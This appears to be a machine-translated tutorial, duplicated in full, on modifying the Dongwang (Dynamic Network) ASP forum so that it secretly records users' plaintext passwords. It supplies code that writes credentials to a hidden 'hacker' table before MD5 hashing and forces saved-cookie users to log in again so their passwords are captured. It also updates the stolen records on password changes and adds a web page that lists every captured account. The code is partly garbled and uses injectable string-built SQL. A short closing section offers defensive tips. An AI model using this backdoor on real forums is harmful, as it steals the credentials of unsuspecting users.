The Dynamic Network Pioneer Forum, with its powerful and comprehensive functions and freely provided to individual users, is unique among the many forums on the Internet. Many people regard it as their best choice for their forum. However, the new version of the forum uses irreversible MD5 encryption for user passwords, and even administrators cannot query the password of individual users. Only encrypted results can be queried in the database.
First describe the login process. The user enters the account number and calls the MD5 function, encrypts the password, and then compares whether the data stored in the database and the password encryption result are the same. If the same is true, login will be successful and save your personal information in COOKIE.
Now we have to do it ourselves and add a password-recording function to the forum.
Check the source files of the file it logs into the system. The verification process directly calls the chklogin() function. Following up on the chklogin() function, you can see that the previous sentences are checking whether the user inputs in full, and then:
password=md5(trim(checkStr(request("password"))))
This sentence calls the MD5 encryption function to encrypt the password submitted by the user. If we want to record unencrypted code, we need to add our own code to the front of this sentence. Don't rush to write code first, because we have to store the password in the database, so we have to first assume our own table in the database.
Open the database file of Dongwang, because we only need to save two contents in this table: user name and password, so open "Create table using designer", enter user and pass in the field name respectively, and the data type is text. Then save the table and named it hacker.
Next, we can use SQL commands in the ASP program to add the username and password to the table we just created. We just need to prefix the above code:
‘First query the database and check whether the user’s password has been recorded to avoid repeated additions.
set rs=("select user from hacker where user="&request("username")&"")
if and then
‘If not, insert the username and password into the table we just created
sql="insert into hacker (user,pass) values ("&request("username")&","&request("password")&")"
(sql)
else
end if
Through the above code, every time a user logs in, the user name and password will be automatically added to the table hacker we created.
However, the Dynamic Network Forum also has a function, which is to use COOKIE to save login information for a day, a month, or a year, so that you don’t have to enter your account every time you visit. Of course, we don’t want to miss the password of this part of the users, so we have to find a way to invalidate its COOKIE, so that it must log in through the files we modified.
The code checked by the Dynamic Network Forum for COOKIE is saved in the \INC\ file, and we open it to view its source file.
membername=checkStr(("aspsky")("username"))
memberclass=checkStr(("aspsky")("userclass"))
memberword=checkStr(("aspsky")("password"))
[$nbsp][$nbsp][$nbsp][$nbsp] These three sentences are used to check the information stored in the user's COOKIE. As long as we change any variable, our login can be invalid. I added the following codes after the second sentence:
‘Check whether the user’s account has been recorded. If not, modify its password variable to the user name.
set rs=("select user from hacker where user="&membername&"")
if and then
memberword=checkStr(("aspsky")("username"))
else
‘If it has been recorded, COOKIE verification is normal, so that the user will not be suspicious because COOKIE is completely invalid.
memberword=checkStr(("aspsky")("password"))
end if
We basically complete the code to record the user's account. As soon as the user logs in, his account will be directly added to our database. However, we also missed one thing, that is, if the user changes the password, the password we recorded will expire, and our recording program cannot determine whether the password has been modified. So we have to continue to modify the program we modify passwords.
rs("userpassword")=password
rs("quesion")=quesion
rs("answer")=answer
The above code is the code that updates the password. Let’s analyze: Only the user can change the password after logging in. Since he has logged in, his password must be recorded in our database. So no matter what his password is changed, we only need to update our database. So before the above four sentences, add the following two sentences:
[$nbsp][$nbsp]'Note that we do not use the variable password here because it is the result of MD5 encryption
sql = "update hacker set pass="&request("psw")&" where user="&membername&""
(sql)
In the end, we cannot open the database to query the user's password every time, so we also have to write an asp program ourselves to query the user's password through the WEB interface.
Below is the asp code I wrote myself, borrowing a function used by the Dynamic Network Forum to fuzzy query. You can directly search for the user name to obtain an account or display all recorded accounts.
<!--#include file=""-->
<!--#include file="inc/" -->
<%
‘The function translate() used by dynamic network to fuzzy query
public function translate(sourceStr,fieldStr)
[$nbsp][$nbsp]dim sourceList
[$nbsp][$nbsp]dim resultStr
[$nbsp][$nbsp]dim i,j
[$nbsp][$nbsp]if instr(sourceStr," ")>0 then
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]dim isOperator
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]sourceList=split(sourceStr)
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]--------------------------------------------------------
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]rem "num:" & cstr(ubound(sourceList)) & "<br>"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]for i = 0 to ubound(sourceList)
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]rem i
[$nbsp][$nbsp][$nbsp][$nbsp]Select Case ucase(sourceList(i))
[$nbsp][$nbsp][$nbsp][$nbsp]Case "AND","&","and","and"and"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " and "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case "OR","|"," or "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " or "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case "NOT","!","Not","!"!"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " not "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case "(","(","("
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " ( "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case ")",")",")"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " ) "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case Else
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]if sourceList(i)<>"" then
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]if not isOperator then resultStr=resultStr & " and "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]if inStr(sourceList(i),"%") > 0 then
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr&" "&fieldStr& " like " & replace(sourceList(i),"","") & " "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]else
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr&" "&fieldStr& " like %" & replace(sourceList(i),"","") & "% "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]end if
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator=false
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]End if
[$nbsp][$nbsp][$nbsp][$nbsp]End Select
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]rem resultStr+"<br>"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]next
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]translate=resultStr
[$nbsp][$nbsp]else Single condition
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]if inStr(sourcestr,"%") > 0 then
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]translate=" " & fieldStr & " like " & replace(sourceStr,"","") &" "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]else
[$nbsp][$nbsp][$nbsp][$nbsp]translate=" " & fieldStr & " like %" & replace(sourceStr,"","") &"% "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]End if
[$nbsp][$nbsp]end if
end function
%>
<%
‘Check whether to use fuzzy query, if so, query the database
if ("id") <> "" then
dim key
key = ("id")
set rs=("select user,pass from hacker where (" & translate(key,"user") & ")")
‘Check whether to query all accounts. If so, query all records
else if ("id") <> "all" then
else
set rs=("select * from hacker")
end if
end if
%>
<div align="center">
[$nbsp][$nbsp]<p><strong>Query password</strong></p>
[$nbsp][$nbsp]<form name="form1" method="post" action="">
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]Username:
[$nbsp][$nbsp][$nbsp][$nbsp]<input name="id" type="text" size="12">
[$nbsp][$nbsp][$nbsp][$nbsp]
[$nbsp][$nbsp][$nbsp][$nbsp]<input type="submit" name="Submit" value="Search">
[$nbsp][$nbsp]</form>
[$nbsp][$nbsp]<p><a href="?id=all">Show all </a></p>
[$nbsp][$nbsp]<table width="300" border="1" cellspacing="0" cellpadding="0">
<%
‘Check whether to query the account. If it is not displayed, please select the query method, otherwise the results will be displayed.
if ("id") <> "" or ("id") <> "" then %><tr>
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]<td width="150"><div align="center">Username</div></td>
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]<td width="150"><div align="center">Password</div></td>
[$nbsp][$nbsp][$nbsp][$nbsp]</tr>
<% Do while (not ) %><tr>
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]<td><% =rs("user") %></td>
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]<td><% =rs("pass") %></td>
[$nbsp][$nbsp][$nbsp][$nbsp]</tr>
[$nbsp][$nbsp]<%
[$nbsp][$nbsp] Loop
[$nbsp][$nbsp]
[$nbsp][$nbsp]else
[$nbsp][$nbsp]("<tr><td><center>Please select the query method</center></td></tr>")
[$nbsp][$nbsp]end if
[$nbsp][$nbsp] %>
[$nbsp][$nbsp]</table>
</div>
[$nbsp][$nbsp][$nbsp][$nbsp]
Some other thoughts:
If the server is hacked, we must also prevent the forum from being modified and become a tool for others to obtain passwords, so we must consider the common methods used by hackers.
First of all, we need to check whether the database is complete at any time, and we must achieve timely seniority. Nowadays, a popular way to change the database suffix name to asp and add an undeletable table to the database can effectively prevent the database from being downloaded by others. To put it another way, a hacker is likely to change the suffix name of his own database file to asp, thus hiding it in numerous files. Generally, it is difficult for inexperienced administrators to find out, so they need to check the files of the entire website regularly. If the asp files are extra for no reason, they are likely to be the ones behind them.
Hackers can not only put their own asp files, but smart hackers will also hide their own asp files in existing asp files. Using a browser, you can transfer querystring variables to the asp file. If a conditional statement is set in asp: if ("variable") = " then... This simple method can be said to be unpredictable. Due to the convenience of the database, ordinary administrators rarely consider checking whether the files on the server have been modified. Therefore, it is also very necessary to check whether the file has been modified regularly.
First describe the login process. The user enters the account number and calls the MD5 function, encrypts the password, and then compares whether the data stored in the database and the password encryption result are the same. If the same is true, login will be successful and save your personal information in COOKIE.
Now we have to do it ourselves and add a password-recording function to the forum.
Check the source files of the file it logs into the system. The verification process directly calls the chklogin() function. Following up on the chklogin() function, you can see that the previous sentences are checking whether the user inputs in full, and then:
password=md5(trim(checkStr(request("password"))))
This sentence calls the MD5 encryption function to encrypt the password submitted by the user. If we want to record unencrypted code, we need to add our own code to the front of this sentence. Don't rush to write code first, because we have to store the password in the database, so we have to first assume our own table in the database.
Open the database file of Dongwang, because we only need to save two contents in this table: user name and password, so open "Create table using designer", enter user and pass in the field name respectively, and the data type is text. Then save the table and named it hacker.
Next, we can use SQL commands in the ASP program to add the username and password to the table we just created. We just need to prefix the above code:
‘First query the database and check whether the user’s password has been recorded to avoid repeated additions.
set rs=("select user from hacker where user="&request("username")&"")
if and then
‘If not, insert the username and password into the table we just created
sql="insert into hacker (user,pass) values ("&request("username")&","&request("password")&")"
(sql)
else
end if
Through the above code, every time a user logs in, the user name and password will be automatically added to the table hacker we created.
However, the Dynamic Network Forum also has a function, which is to use COOKIE to save login information for a day, a month, or a year, so that you don’t have to enter your account every time you visit. Of course, we don’t want to miss the password of this part of the users, so we have to find a way to invalidate its COOKIE, so that it must log in through the files we modified.
The code checked by the Dynamic Network Forum for COOKIE is saved in the \INC\ file, and we open it to view its source file.
membername=checkStr(("aspsky")("username"))
memberclass=checkStr(("aspsky")("userclass"))
memberword=checkStr(("aspsky")("password"))
[$nbsp][$nbsp][$nbsp][$nbsp] These three sentences are used to check the information stored in the user's COOKIE. As long as we change any variable, our login can be invalid. I added the following codes after the second sentence:
‘Check whether the user’s account has been recorded. If not, modify its password variable to the user name.
set rs=("select user from hacker where user="&membername&"")
if and then
memberword=checkStr(("aspsky")("username"))
else
‘If it has been recorded, COOKIE verification is normal, so that the user will not be suspicious because COOKIE is completely invalid.
memberword=checkStr(("aspsky")("password"))
end if
We basically complete the code to record the user's account. As soon as the user logs in, his account will be directly added to our database. However, we also missed one thing, that is, if the user changes the password, the password we recorded will expire, and our recording program cannot determine whether the password has been modified. So we have to continue to modify the program we modify passwords.
rs("userpassword")=password
rs("quesion")=quesion
rs("answer")=answer
The above code is the code that updates the password. Let’s analyze: Only the user can change the password after logging in. Since he has logged in, his password must be recorded in our database. So no matter what his password is changed, we only need to update our database. So before the above four sentences, add the following two sentences:
[$nbsp][$nbsp]'Note that we do not use the variable password here because it is the result of MD5 encryption
sql = "update hacker set pass="&request("psw")&" where user="&membername&""
(sql)
In the end, we cannot open the database to query the user's password every time, so we also have to write an asp program ourselves to query the user's password through the WEB interface.
Below is the asp code I wrote myself, borrowing a function used by the Dynamic Network Forum to fuzzy query. You can directly search for the user name to obtain an account or display all recorded accounts.
<!--#include file=""-->
<!--#include file="inc/" -->
<%
‘The function translate() used by dynamic network to fuzzy query
public function translate(sourceStr,fieldStr)
[$nbsp][$nbsp]dim sourceList
[$nbsp][$nbsp]dim resultStr
[$nbsp][$nbsp]dim i,j
[$nbsp][$nbsp]if instr(sourceStr," ")>0 then
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]dim isOperator
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]sourceList=split(sourceStr)
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]--------------------------------------------------------
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]rem "num:" & cstr(ubound(sourceList)) & "<br>"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]for i = 0 to ubound(sourceList)
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]rem i
[$nbsp][$nbsp][$nbsp][$nbsp]Select Case ucase(sourceList(i))
[$nbsp][$nbsp][$nbsp][$nbsp]Case "AND","&","and","and"and"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " and "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case "OR","|"," or "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " or "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case "NOT","!","Not","!"!"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " not "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case "(","(","("
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " ( "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case ")",")",")"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr & " ) "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator = true
[$nbsp][$nbsp][$nbsp][$nbsp]Case Else
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]if sourceList(i)<>"" then
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]if not isOperator then resultStr=resultStr & " and "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]if inStr(sourceList(i),"%") > 0 then
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr&" "&fieldStr& " like " & replace(sourceList(i),"","") & " "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]else
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]resultStr=resultStr&" "&fieldStr& " like %" & replace(sourceList(i),"","") & "% "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]end if
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]isOperator=false
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]End if
[$nbsp][$nbsp][$nbsp][$nbsp]End Select
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]rem resultStr+"<br>"
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]next
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]translate=resultStr
[$nbsp][$nbsp]else Single condition
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]if inStr(sourcestr,"%") > 0 then
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]translate=" " & fieldStr & " like " & replace(sourceStr,"","") &" "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]else
[$nbsp][$nbsp][$nbsp][$nbsp]translate=" " & fieldStr & " like %" & replace(sourceStr,"","") &"% "
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]End if
[$nbsp][$nbsp]end if
end function
%>
<%
‘Check whether to use fuzzy query, if so, query the database
if ("id") <> "" then
dim key
key = ("id")
set rs=("select user,pass from hacker where (" & translate(key,"user") & ")")
‘Check whether to query all accounts. If so, query all records
else if ("id") <> "all" then
else
set rs=("select * from hacker")
end if
end if
%>
<div align="center">
[$nbsp][$nbsp]<p><strong>Query password</strong></p>
[$nbsp][$nbsp]<form name="form1" method="post" action="">
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]Username:
[$nbsp][$nbsp][$nbsp][$nbsp]<input name="id" type="text" size="12">
[$nbsp][$nbsp][$nbsp][$nbsp]
[$nbsp][$nbsp][$nbsp][$nbsp]<input type="submit" name="Submit" value="Search">
[$nbsp][$nbsp]</form>
[$nbsp][$nbsp]<p><a href="?id=all">Show all </a></p>
[$nbsp][$nbsp]<table width="300" border="1" cellspacing="0" cellpadding="0">
<%
‘Check whether to query the account. If it is not displayed, please select the query method, otherwise the results will be displayed.
if ("id") <> "" or ("id") <> "" then %><tr>
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]<td width="150"><div align="center">Username</div></td>
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]<td width="150"><div align="center">Password</div></td>
[$nbsp][$nbsp][$nbsp][$nbsp]</tr>
<% Do while (not ) %><tr>
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]<td><% =rs("user") %></td>
[$nbsp][$nbsp][$nbsp][$nbsp][$nbsp][$nbsp]<td><% =rs("pass") %></td>
[$nbsp][$nbsp][$nbsp][$nbsp]</tr>
[$nbsp][$nbsp]<%
[$nbsp][$nbsp] Loop
[$nbsp][$nbsp]
[$nbsp][$nbsp]else
[$nbsp][$nbsp]("<tr><td><center>Please select the query method</center></td></tr>")
[$nbsp][$nbsp]end if
[$nbsp][$nbsp] %>
[$nbsp][$nbsp]</table>
</div>
[$nbsp][$nbsp][$nbsp][$nbsp]
Some other thoughts:
If the server is hacked, we must also prevent the forum from being modified and become a tool for others to obtain passwords, so we must consider the common methods used by hackers.
First of all, we need to check whether the database is complete at any time, and we must achieve timely seniority. Nowadays, a popular way to change the database suffix name to asp and add an undeletable table to the database can effectively prevent the database from being downloaded by others. To put it another way, a hacker is likely to change the suffix name of his own database file to asp, thus hiding it in numerous files. Generally, it is difficult for inexperienced administrators to find out, so they need to check the files of the entire website regularly. If the asp files are extra for no reason, they are likely to be the ones behind them.
Hackers can not only put their own asp files, but smart hackers will also hide their own asp files in existing asp files. Using a browser, you can transfer querystring variables to the asp file. If a conditional statement is set in asp: if ("variable") = " then... This simple method can be said to be unpredictable. Due to the convenience of the database, ordinary administrators rarely consider checking whether the files on the server have been modified. Therefore, it is also very necessary to check whether the file has been modified regularly.